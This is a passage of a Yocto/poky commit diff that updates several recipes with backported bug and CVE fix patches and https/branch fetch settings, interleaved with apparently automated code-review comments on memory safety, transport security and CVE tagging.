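Review bot: `ds_free` in the rewritten src/dstring.c releases `ds_string` but leaves the pointer, `ds_size` and `ds_idx` as they were, so a `dynamic_string` touched again after `ds_free` would write through or reallocate a freed pointer on the next `ds_resize`. The callers visible in this patch only free at function exit, so this is hardening rather than a live bug; resetting the record closes the gap: `free (string->ds_string); ds_init (string);`. The unchanged comment above `ds_init` still says "with space for SIZE characters" although the parameter is gone, and the `Upstream-Status: Backport` line carries no upstream reference, unlike the bracketed link form the libsolv patch in this commit switches to. As the file is a backport of three upstream commits, the code change is probably better proposed upstream than carried locally.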
@@ -9,6 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949" SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \ file://0001-Unset-need_charset_alias-when-building-for-musl.patch \ file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \ + file://CVE-2021-38185.patch \ " SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810" diff --git a/poky/meta/recipes-extended/cups/cups.inc b/poky/meta/recipes-extended/cups/cups.inc index 151ef065fe..15f46937e1 100644 --- a/poky/meta/recipes-extended/cups/cups.inc +++ b/poky/meta/recipes-extended/cups/cups.inc @@ -41,7 +41,7 @@ PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'zeroconf', 'avahi', PACKAGECONFIG[avahi] = "--enable-avahi,--disable-avahi,avahi" PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl" PACKAGECONFIG[pam] = "--enable-pam --with-pam-module=unix, --disable-pam, libpam" -PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--without-systemd,systemd" +PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--disable-systemd,systemd" PACKAGECONFIG[xinetd] = "--with-xinetd=${sysconfdir}/xinetd.d,--without-xinetd,xinetd" EXTRA_OECONF = " \ diff --git a/poky/meta/recipes-extended/go-examples/go-helloworld_0.1.bb b/poky/meta/recipes-extended/go-examples/go-helloworld_0.1.bb index ab70ea98a3..7d0f74186e 100644 --- a/poky/meta/recipes-extended/go-examples/go-helloworld_0.1.bb +++ b/poky/meta/recipes-extended/go-examples/go-helloworld_0.1.bb @@ -5,7 +5,7 @@ HOMEPAGE = "https://golang.org/" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302" -SRC_URI = "git://${GO_IMPORT}" +SRC_URI = "git://${GO_IMPORT};branch=master" SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe" UPSTREAM_CHECK_COMMITS = "1" 
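Review bot: The new `SRC_URI` in go-helloworld_0.1.bb gains `branch=master` but no `protocol=https`, so the fetch stays on the unauthenticated, unencrypted git:// transport while the other recipes touched here are moved to https. `SRCREV` pins the commit, which limits what a tampered transfer can deliver, but the transport still gives no server authentication. If the host behind `${GO_IMPORT}` serves https, the line should read `SRC_URI = "git://${GO_IMPORT};branch=master;protocol=https"`; `GO_IMPORT` is defined outside this hunk, so that needs confirming.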
diff --git a/poky/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch b/poky/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch new file mode 100644 index 0000000000..bf86115843 --- /dev/null +++ b/poky/meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch 
@@ -0,0 +1,79 @@ +From 86ed08936d49e2c81ef49dfbd02aca1c74d0c098 Mon Sep 17 00:00:00 2001 +From: lac-0073 <61903197+lac-0073@users.noreply.github.com> +Date: Mon, 26 Oct 2020 09:45:42 +0800 +Subject: [PATCH] arpping: make update neighbours work again + +The arping is using inconsistent sender_ip_addr and target_ip_addr in +messages. This causes the client receiving the arp message not to update +the arp table entries. + +The specific performance is as follows: + +There is a machine 2 with IP 10.20.30.3 configured on eth0:0 that is in the +same IP subnet as eth0. This IP was originally used on another machine 1, +and th IP needs to be changed back to the machine 1. When using the arping +command to announce what ethernet address has IP 10.20.30.3, the arp table +on machine 3 is not updated. + +Machine 3 original arp table: + + 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02 + 10.20.30.2 machine 2 eth0 00:00:00:00:00:02 + 10.20.30.1 machine 1 eth0 00:00:00:00:00:01 + +Create interface eth0:0 on machine 1, and use the arping command to send arp +packets. 
Expected outcome on machine 3: + + 10.20.30.3 machine 1 eth0:0 00:00:00:00:00:01 + 10.20.30.2 machine 2 eth0 00:00:00:00:00:02 + 10.20.30.1 machine 1 eth0 00:00:00:00:00:01 + +Actual results on machine 3: + + 10.20.30.3 machine 2 eth0:0 00:00:00:00:00:02 + 10.20.30.2 machine 2 eth0 00:00:00:00:00:02 + 10.20.30.1 machine 1 eth0 00:00:00:00:00:01 + +Fixes: https://github.com/iputils/iputils/issues/298 +Fixes: 68f12fc4a0dbef4ae4c404da24040d22c5a14339 +Signed-off-by: Aichun Li <liaichun@huawei.com> +Upstream-Status: Backport [https://github.com/iputils/iputils/commit/86ed08936d49e2c81ef49dfbd02aca1c74d0c098] +Signed-off-by: Visa Hankala <visa@hankala.org> +--- + arping.c | 16 +++++++++------- + 1 file changed, 9 insertions(+), 7 deletions(-) + +diff --git a/arping.c b/arping.c +index a002786..53fdbb4 100644 +--- a/arping.c ++++ b/arping.c +@@ -968,7 +968,7 @@ int main(int argc, char **argv) + } + memset(&saddr, 0, sizeof(saddr)); + saddr.sin_family = AF_INET; +- if (!ctl.unsolicited && (ctl.source || ctl.gsrc.s_addr)) { ++ if (ctl.source || ctl.gsrc.s_addr) { + saddr.sin_addr = ctl.gsrc; + if (bind(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) + error(2, errno, "bind"); +@@ -979,12 +979,14 @@ int main(int argc, char **argv) + saddr.sin_port = htons(1025); + saddr.sin_addr = ctl.gdst; + +- if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1) +- error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)")); +- if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) +- error(2, errno, "connect"); +- if (getsockname(probe_fd, (struct sockaddr *)&saddr, &alen) == -1) +- error(2, errno, "getsockname"); ++ if (!ctl.unsolicited) { ++ if (setsockopt(probe_fd, SOL_SOCKET, SO_DONTROUTE, (char *)&on, sizeof(on)) == -1) ++ error(0, errno, _("WARNING: setsockopt(SO_DONTROUTE)")); ++ if (connect(probe_fd, (struct sockaddr *)&saddr, sizeof(saddr)) == -1) ++ error(2, errno, "connect"); ++ if (getsockname(probe_fd, (struct sockaddr 
*)&saddr, &alen) == -1) ++ error(2, errno, "getsockname"); ++ } + ctl.gsrc = saddr.sin_addr; + } + close(probe_fd); diff --git a/poky/meta/recipes-extended/iputils/iputils_s20190709.bb b/poky/meta/recipes-extended/iputils/iputils_s20190709.bb index d652bfcaad..a715d0a37b 100644 --- a/poky/meta/recipes-extended/iputils/iputils_s20190709.bb +++ b/poky/meta/recipes-extended/iputils/iputils_s20190709.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=55aa8c9fcad0691cef0ecd420361e390" DEPENDS = "gnutls" -SRC_URI = "git://github.com/iputils/iputils \ +SRC_URI = "git://github.com/iputils/iputils;branch=master;protocol=https \ file://0001-ninfod-change-variable-name-to-avoid-colliding-with-.patch \ file://0001-ninfod-fix-systemd-Documentation-url-error.patch \ file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \ @@ -20,6 +20,7 @@ SRC_URI = "git://github.com/iputils/iputils \ file://0003-arping-Fix-comparison-of-different-signedness-warnin.patch \ file://0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch \ file://0005-arping-use-additional-timerfd-to-control-when-timeou.patch \ + file://0001-arping-make-update-neighbours-work-again.patch \ " SRCREV = "13e00847176aa23683d68fce1d17ffb523510946" diff --git a/poky/meta/recipes-extended/libaio/libaio_0.3.111.bb b/poky/meta/recipes-extended/libaio/libaio_0.3.111.bb index 8e1cd349a0..309ae53bfb 100644 --- a/poky/meta/recipes-extended/libaio/libaio_0.3.111.bb +++ b/poky/meta/recipes-extended/libaio/libaio_0.3.111.bb @@ -5,7 +5,7 @@ HOMEPAGE = "http://lse.sourceforge.net/io/aio.html" LICENSE = "LGPLv2.1+" LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499" -SRC_URI = "git://pagure.io/libaio.git;protocol=https \ +SRC_URI = "git://pagure.io/libaio.git;protocol=https;branch=master \ file://00_arches.patch \ file://destdir.patch \ file://libaio_fix_for_mips_syscalls.patch \ 
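Review bot: After the second arping.c hunk, `ctl.gsrc = saddr.sin_addr;` runs in unsolicited mode without the `connect()`/`getsockname()` pair, so the source address silently becomes the value copied from `ctl.gdst` a few lines earlier, and nothing in the code says this is intended. A comment on the new guard would make it explicit, e.g. `/* unsolicited: skip the route lookup; sender IP stays equal to the announced address */`. The first hunk also drops `!ctl.unsolicited` from the `bind()` condition, so an explicit source address would now reach `bind()` in that mode and exit through `error(2, errno, "bind")` if it cannot be bound; the patch description does not mention that change. The enclosing block in `main()` starts and ends outside both hunks, so the branch structure is inferred.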
diff --git a/poky/meta/recipes-extended/libnsl/libnsl2_git.bb b/poky/meta/recipes-extended/libnsl/libnsl2_git.bb index 28c84af7ad..cbb38674b9 100644 --- a/poky/meta/recipes-extended/libnsl/libnsl2_git.bb +++ b/poky/meta/recipes-extended/libnsl/libnsl2_git.bb @@ -14,7 +14,7 @@ PV = "1.2.0+git${SRCPV}" SRCREV = "4a062cf4180d99371198951e4ea5b4550efd58a3" -SRC_URI = "git://github.com/thkukuk/libnsl \ +SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-extended/libnss-nis/libnss-nis.bb b/poky/meta/recipes-extended/libnss-nis/libnss-nis.bb index a1d914e871..984cc98fc2 100644 --- a/poky/meta/recipes-extended/libnss-nis/libnss-nis.bb +++ b/poky/meta/recipes-extended/libnss-nis/libnss-nis.bb @@ -17,7 +17,7 @@ PV = "3.1+git${SRCPV}" SRCREV = "062f31999b35393abf7595cb89dfc9590d5a42ad" -SRC_URI = "git://github.com/thkukuk/libnss_nis \ +SRC_URI = "git://github.com/thkukuk/libnss_nis;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch b/poky/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch index 74164ab495..cc8f53cefd 100644 --- a/poky/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch +++ b/poky/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch @@ -11,9 +11,14 @@ been added. (Jobs may point inside the whatproviedes array, so we must not invalidate this area.) -Upstream-Status: Backport -https://github.com/openSUSE/libsolv/commit/0077ef29eb46d2e1df2f230fc95a1d9748d49dec +Upstream-Status: Backport [https://github.com/openSUSE/libsolv/commit/0077ef29eb46d2e1df2f230fc95a1d9748d49dec] CVE: CVE-2021-3200 +CVE: CVE-2021-33928 +CVE: CVE-2021-33929 +CVE: CVE-2021-33930 +CVE: CVE-2021-33938 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com> --- ext/testcase.c | 21 +++++++++++++++++++++ 
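Review bot: The four added `CVE:` tags make this one patch the recorded fix for CVE-2021-33928, CVE-2021-33929, CVE-2021-33930 and CVE-2021-33938, yet the header cites no source for that mapping; the only reference is the single upstream commit already listed for CVE-2021-3200. CVE scanning that reads patch headers will report all four as patched on the strength of these lines alone, so the evidence should sit next to them, for example `Reference: <link to the upstream issue or advisory tying these CVEs to the commit>`. The empty line added between the two `Signed-off-by:` lines also splits the trailer block and can be dropped.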
diff --git a/poky/meta/recipes-extended/libsolv/libsolv_0.7.10.bb b/poky/meta/recipes-extended/libsolv/libsolv_0.7.10.bb index eadf04aa5a..2c2aedc32c 100644 --- a/poky/meta/recipes-extended/libsolv/libsolv_0.7.10.bb +++ b/poky/meta/recipes-extended/libsolv/libsolv_0.7.10.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.BSD;md5=62272bd11c97396d4aaf1c41bc11f7d8" DEPENDS = "expat zlib" -SRC_URI = "git://github.com/openSUSE/libsolv.git \ +SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \ file://CVE-2021-3200.patch \ " diff --git a/poky/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch b/poky/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch index f17bdce2c0..44b9136b05 100644 --- a/poky/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch +++ b/poky/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch @@ -1,4 +1,4 @@ -From 22afc5d9aaa215c3c87ba21c77d47da44ab3b113 Mon Sep 17 00:00:00 2001 +From f918d5ba6ff1d439822be063237aea2705ea27b8 Mon Sep 17 00:00:00 2001 From: Alexander Kanavin <alex.kanavin@gmail.com> Date: Fri, 26 Aug 2016 18:20:32 +0300 Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. @@ -6,15 +6,16 @@ Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. RP 2014/5/22 Upstream-Status: Pending Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> + --- configure.ac | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/configure.ac b/configure.ac -index 5383cec..c29a902 100644 +index dbddfb9..62cf17f 100644 --- a/configure.ac +++ b/configure.ac -@@ -651,10 +651,18 @@ AC_ARG_WITH([pcre], +@@ -748,10 +748,18 @@ AC_ARG_WITH([pcre], ) AC_MSG_RESULT([$WITH_PCRE]) 
@@ -37,6 +38,3 @@ index 5383cec..c29a902 100644 else AC_PATH_PROG([PCRECONFIG], [pcre-config]) if test -n "$PCRECONFIG"; then --- -2.15.0 - diff --git a/poky/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch b/poky/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch new file mode 100644 index 0000000000..e226366112 --- /dev/null +++ b/poky/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch 
@@ -0,0 +1,224 @@ +From a566fe4cc9f9d0ef9cfdcbc13159ef0644e91c9c Mon Sep 17 00:00:00 2001 +From: Glenn Strauss <gstrauss@gluelogic.com> +Date: Wed, 23 Dec 2020 23:14:47 -0500 +Subject: [PATCH] reuse large mem chunks (fix mem usage) (fixes #3033) + +(cherry picked from commit 7ba521ffb4959f6f74a609d5d4acafc29a038337) + +(thx flynn) + +fix large memory usage for large file downloads from dynamic backends + +reuse or release large memory chunks + +x-ref: + "Memory Growth with PUT and full buffered streams" + https://redmine.lighttpd.net/issues/3033 + +Upstream-Status: Backport +Comment: Hunk refreshed to make it backword compatible. +https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337 +Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com> + +--- + src/chunk.c | 99 +++++++++++++++++++++++++++++++++--------- + src/chunk.h | 2 + + src/http-header-glue.c | 2 +- + 3 files changed, 82 insertions(+), 21 deletions(-) + +diff --git a/src/chunk.c b/src/chunk.c +index 133308f..d7259b9 100644 +--- a/src/chunk.c ++++ b/src/chunk.c +@@ -28,16 +28,20 @@ + static size_t chunk_buf_sz = 8192; + static chunk *chunks, *chunks_oversized; + static chunk *chunk_buffers; ++static int chunks_oversized_n; + static array *chunkqueue_default_tempdirs = NULL; + static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; + + void chunkqueue_set_chunk_size (size_t sz) + { +- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192; ++ size_t x = 1024; ++ while (x < sz && x < (1u << 30)) x <<= 1; ++ chunk_buf_sz = sz > 0 ? 
x : 8192; + } + + void chunkqueue_set_tempdirs_default_reset (void) + { ++ chunk_buf_sz = 8192; + chunkqueue_default_tempdirs = NULL; + chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; + } +@@ -120,15 +124,49 @@ static void chunk_free(chunk *c) { + free(c); + } + +-buffer * chunk_buffer_acquire(void) { ++static chunk * chunk_pop_oversized(size_t sz) { ++ /* future: might have buckets of certain sizes, up to socket buf sizes */ ++ if (chunks_oversized && chunks_oversized->mem->size >= sz) { ++ --chunks_oversized_n; ++ chunk *c = chunks_oversized; ++ chunks_oversized = c->next; ++ return c; ++ } ++ return NULL; ++} ++ ++static void chunk_push_oversized(chunk * const c, const size_t sz) { ++ if (chunks_oversized_n < 64 && chunk_buf_sz >= 4096) { ++ ++chunks_oversized_n; ++ chunk **co = &chunks_oversized; ++ while (*co && sz < (*co)->mem->size) co = &(*co)->next; ++ c->next = *co; ++ *co = c; ++ } ++ else ++ chunk_free(c); ++} ++ ++static buffer * chunk_buffer_acquire_sz(size_t sz) { + chunk *c; + buffer *b; +- if (chunks) { +- c = chunks; +- chunks = c->next; ++ if (sz <= chunk_buf_sz) { ++ if (chunks) { ++ c = chunks; ++ chunks = c->next; ++ } ++ else ++ c = chunk_init(chunk_buf_sz); ++ /* future: might choose to pop from chunks_oversized, if available ++ * (even if larger than sz) rather than allocating new chunk ++ * (and if doing so, might replace chunks_oversized_n) */ + } + else { +- c = chunk_init(chunk_buf_sz); ++ /*(round up to nearest chunk_buf_sz)*/ ++ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1); ++ c = chunk_pop_oversized(sz); ++ if (NULL == c) ++ c = chunk_init(sz); + } + c->next = chunk_buffers; + chunk_buffers = c; +@@ -137,21 +175,47 @@ buffer * chunk_buffer_acquire(void) { + return b; + } + ++buffer * chunk_buffer_acquire(void) { ++ return chunk_buffer_acquire_sz(chunk_buf_sz); ++} ++ + void chunk_buffer_release(buffer *b) { + if (NULL == b) return; +- if (b->size >= chunk_buf_sz && chunk_buffers) { ++ if (chunk_buffers) { + chunk *c = 
chunk_buffers; + chunk_buffers = c->next; + c->mem = b; +- c->next = chunks; +- chunks = c; + buffer_clear(b); ++ if (b->size == chunk_buf_sz) { ++ c->next = chunks; ++ chunks = c; ++ } ++ else if (b->size > chunk_buf_sz) ++ chunk_push_oversized(c, b->size); ++ else ++ chunk_free(c); + } + else { + buffer_free(b); + } + } + ++size_t chunk_buffer_prepare_append(buffer * const b, size_t sz) { ++ if (sz > chunk_buffer_string_space(b)) { ++ sz += b->used ? b->used : 1; ++ buffer * const cb = chunk_buffer_acquire_sz(sz); ++ /* swap buffer contents and copy original b->ptr into larger b->ptr */ ++ /*(this does more than buffer_move())*/ ++ buffer tb = *b; ++ *b = *cb; ++ *cb = tb; ++ if ((b->used = tb.used)) ++ memcpy(b->ptr, tb.ptr, tb.used); ++ chunk_buffer_release(cb); ++ } ++ return chunk_buffer_string_space(b); ++} ++ + static chunk * chunk_acquire(size_t sz) { + if (sz <= chunk_buf_sz) { + if (chunks) { +@@ -162,13 +226,10 @@ static chunk * chunk_acquire(size_t sz) { + sz = chunk_buf_sz; + } + else { +- sz = (sz + 8191) & ~8191uL; +- /* future: might have buckets of certain sizes, up to socket buf sizes*/ +- if (chunks_oversized && chunks_oversized->mem->size >= sz) { +- chunk *c = chunks_oversized; +- chunks_oversized = c->next; +- return c; +- } ++ /*(round up to nearest chunk_buf_sz)*/ ++ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1); ++ chunk *c = chunk_pop_oversized(sz); ++ if (c) return c; + } + + return chunk_init(sz); +@@ -183,10 +244,7 @@ static void chunk_release(chunk *c) { + } + else if (sz > chunk_buf_sz) { + chunk_reset(c); +- chunk **co = &chunks_oversized; +- while (*co && sz < (*co)->mem->size) co = &(*co)->next; +- c->next = *co; +- *co = c; ++ chunk_push_oversized(c, sz); + } + else { + chunk_free(c); +@@ -205,6 +263,7 @@ void chunkqueue_chunk_pool_clear(void) + chunk_free(c); + } + chunks_oversized = NULL; ++ chunks_oversized_n = 0; + } + + void chunkqueue_chunk_pool_free(void) +diff --git a/src/chunk.h b/src/chunk.h +index 4c6b7e4..93f343c 
100644 +--- a/src/chunk.h ++++ b/src/chunk.h +@@ -50,6 +50,8 @@ typedef struct { + buffer * chunk_buffer_acquire(void); + void chunk_buffer_release(buffer *b); + ++size_t chunk_buffer_prepare_append (buffer *b, size_t sz); ++ + void chunkqueue_chunk_pool_clear(void); + void chunkqueue_chunk_pool_free(void); + +diff --git a/src/http-header-glue.c b/src/http-header-glue.c +index d54f00c..2231fba 100644 +--- a/src/http-header-glue.c ++++ b/src/http-header-glue.c +@@ -1267,7 +1267,7 @@ handler_t http_response_read(server *srv, connection *con, http_response_opts *o + if (avail < toread) { + /*(add avail+toread to reduce allocations when ioctl EOPNOTSUPP)*/ + avail = avail ? avail - 1 + toread : toread; +- buffer_string_prepare_append(b, avail); ++ avail = chunk_buffer_prepare_append(b, avail); + } + + n = read(fd, b->ptr+buffer_string_length(b), avail); diff --git a/poky/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch b/poky/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch new file mode 100644 index 0000000000..fd75ca6e26 --- /dev/null +++ b/poky/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch 
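Review bot: The rounding `sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);` added in chunk_buffer_acquire_sz() and chunk_acquire() is only correct while chunk_buf_sz is a power of two and the addition does not wrap, and neither condition is stated or checked in src/chunk.c. The power-of-two property now comes from the new loop in chunkqueue_set_chunk_size(), so I would record it at the declaration, e.g. `/* invariant: power of two; the mask rounding in chunk_acquire() and chunk_buffer_acquire_sz() relies on it */`. chunk_buffer_prepare_append() also does `sz += b->used ? b->used : 1;` unchecked before the later memcpy of tb.used bytes. The one caller shown, http_response_read(), passes a value derived from toread, so this is probably bounded in practice, but a wrap-around guard at the top of chunk_buffer_prepare_append() would make that explicit. The inner hunks show only parts of these functions, so callers outside the patch are not visible here.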
@@ -0,0 +1,35 @@ +From 2e08ee1d404e308f15551277e92b7605ddfa96a8 Mon Sep 17 00:00:00 2001 +From: Glenn Strauss <gstrauss@gluelogic.com> +Date: Fri, 29 Nov 2019 18:18:52 -0500 +Subject: [PATCH] default chunk size 8k (was 4k) + +Upstream-Status: Backport +Comment: No hunk refreshed +https://git.lighttpd.net/lighttpd/lighttpd1.4/commit/304e46d4f808c46cbb025edfacf2913a30ce8855 +Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com> +--- + src/chunk.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/src/chunk.c b/src/chunk.c +index 09dd3f1..133308f 100644 +--- a/src/chunk.c ++++ b/src/chunk.c +@@ -25,7 +25,7 @@ + #define DEFAULT_TEMPFILE_SIZE (1 * 1024 * 1024) + #define MAX_TEMPFILE_SIZE (128 * 1024 * 1024) + +-static size_t chunk_buf_sz = 4096; ++static size_t chunk_buf_sz = 8192; + static chunk *chunks, *chunks_oversized; + static chunk *chunk_buffers; + static array *chunkqueue_default_tempdirs = NULL; +@@ -33,7 +33,7 @@ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; + + void chunkqueue_set_chunk_size (size_t sz) + { +- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 4096; ++ chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192; + } + + void chunkqueue_set_tempdirs_default_reset (void) diff --git a/poky/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb b/poky/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb index 35a268a03f..737d6ebf7c 100644 --- a/poky/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb +++ b/poky/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb @@ -18,6 +18,8 @@ SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.t file://lighttpd.conf \ file://lighttpd \ file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \ + file://default-chunk-size-8k.patch \ + file://0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch \ " SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03" 
diff --git a/poky/meta/recipes-extended/ltp/ltp_20200120.bb b/poky/meta/recipes-extended/ltp/ltp_20200120.bb index 6633755a20..505b7b14fc 100644 --- a/poky/meta/recipes-extended/ltp/ltp_20200120.bb +++ b/poky/meta/recipes-extended/ltp/ltp_20200120.bb @@ -29,7 +29,7 @@ CFLAGS_append_powerpc64 = " -D__SANE_USERSPACE_TYPES__" CFLAGS_append_mipsarchn64 = " -D__SANE_USERSPACE_TYPES__" SRCREV = "4079aaf264d0e9ead042b59d1c5f4e643620d0d5" -SRC_URI = "git://github.com/linux-test-project/ltp.git \ +SRC_URI = "git://github.com/linux-test-project/ltp.git;branch=master;protocol=https \ file://0001-build-Add-option-to-select-libc-implementation.patch \ file://0003-Check-if-__GLIBC_PREREQ-is-defined-before-using-it.patch \ file://0004-guard-mallocopt-with-__GLIBC__.patch \ diff --git a/poky/meta/recipes-extended/newt/libnewt_0.52.21.bb b/poky/meta/recipes-extended/newt/libnewt_0.52.21.bb index 88b4cf4a03..3d35a17c92 100644 --- a/poky/meta/recipes-extended/newt/libnewt_0.52.21.bb +++ b/poky/meta/recipes-extended/newt/libnewt_0.52.21.bb @@ -29,7 +29,7 @@ SRC_URI[sha256sum] = "265eb46b55d7eaeb887fca7a1d51fe115658882dfe148164b6c49fccac S = "${WORKDIR}/newt-${PV}" -inherit autotools-brokensep python3native python3-dir +inherit autotools-brokensep python3native python3-dir python3targetconfig EXTRA_OECONF = "--without-tcl --with-python" diff --git a/poky/meta/recipes-extended/procps/procps_3.3.16.bb b/poky/meta/recipes-extended/procps/procps_3.3.16.bb index 2810ebd285..3a8289b359 100644 --- a/poky/meta/recipes-extended/procps/procps_3.3.16.bb +++ b/poky/meta/recipes-extended/procps/procps_3.3.16.bb @@ -12,7 +12,7 @@ DEPENDS = "ncurses" inherit autotools gettext pkgconfig update-alternatives -SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https \ +SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https;branch=master \ file://sysctl.conf \ " SRCREV = "59c88e18f29000ceaf7e5f98181b07be443cf12f" 
diff --git a/poky/meta/recipes-extended/psmisc/psmisc_23.3.bb b/poky/meta/recipes-extended/psmisc/psmisc_23.3.bb index e569f1074b..36e6775f9e 100644 --- a/poky/meta/recipes-extended/psmisc/psmisc_23.3.bb +++ b/poky/meta/recipes-extended/psmisc/psmisc_23.3.bb @@ -2,7 +2,7 @@ require psmisc.inc LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3" -SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https \ +SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https;branch=master \ file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \ " SRCREV = "78bde849041e6c914a2a517ebe1255b86dc98772" diff --git a/poky/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb b/poky/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb index cb5b288c48..0f8a6f74f8 100644 --- a/poky/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb +++ b/poky/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb @@ -19,7 +19,7 @@ PV = "1.4+git${SRCPV}" SRCREV = "9bc3b5b785723cfff459b0c01b39d87d4bed975c" -SRC_URI = "git://github.com/thkukuk/${BPN} \ +SRC_URI = "git://github.com/thkukuk/${BPN};branch=master;protocol=https \ file://0001-Use-cross-compiled-rpcgen.patch \ " diff --git a/poky/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch b/poky/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch new file mode 100644 index 0000000000..9dfca0441b --- /dev/null +++ b/poky/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch 
